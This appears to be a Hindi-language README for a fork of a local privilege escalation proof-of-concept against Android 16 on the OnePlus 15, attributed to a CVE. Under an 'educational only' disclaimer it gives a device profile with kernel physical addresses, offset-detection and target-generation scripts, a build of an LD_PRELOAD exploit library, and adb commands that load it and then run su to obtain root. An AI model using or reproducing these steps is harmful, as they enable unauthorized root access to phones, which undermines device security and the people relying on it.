
# Android 16 स्थानीय विशेषाधिकार वृद्धि के लिए शैक्षिक प्रूफ-ऑफ-कॉन्सेप्ट OnePlus 15 पर Android 16 स्थानीय विशेषाधिकार वृद्धि के लिए शैक्षिक प्रूफ-ऑफ-कॉन्सेप्ट, जिसमें कर्नेल ऑफसेट पहचान, लक्ष्य निर्माण, और LD_PRELOAD-आधारित एक्सप्लॉइट बिल्ड शामिल है।
चेतावनी: यह रिपॉजिटरी केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान की गई है। कोई पूर्व-निर्मित बाइनरी या रिलीज़ वितरित नहीं की जाती हैं। आपको सब कुछ स्रोत से बनाना होगा।
OnePlus 15 के लिए Android 16 स्थानीय विशेषाधिकार वृद्धि।
x-spy/CVE-2026-43499-popsicle का फ़ोर्क जिसमें kallsyms संरेखण सुधार और एक सत्यापित OnePlus 15 प्रोफ़ाइल शामिल है।
प्रोफ़ाइल में दो भौतिक पते हैं जिन्हें समान फर्मवेयर चलाने वाले रूटेड डिवाइस से पुष्टि की जानी चाहिए:
{
"p0_phys_offset": "0x80000000",
"p0_kernel_phys_load": "0xc7800000"
}
रूटेड डिवाइस के साथ ऑटो-डिटेक्ट करें:
python3 detect_offset.py
Python 3 और llvm-objdump की आवश्यकता है:
python3 generate_target.py \
--boot boot.img \
--profile profile_oneplus15.json \
-o source/src/target.h
make -C source clean preload
यदि NDK स्वचालित रूप से पहचाना नहीं जाता है:
NDK_ROOT=/path/to/android-ndk make -C source clean preload
आउटपुट: source/build/bin/preload.so
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell chmod 0644 /data/local/tmp/preload.so
adb shell LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true
adb shell /data/local/tmp/su -c id
x-spy को मूल एक्सप्लॉइट और CVE खोज के लिए धन्यवाद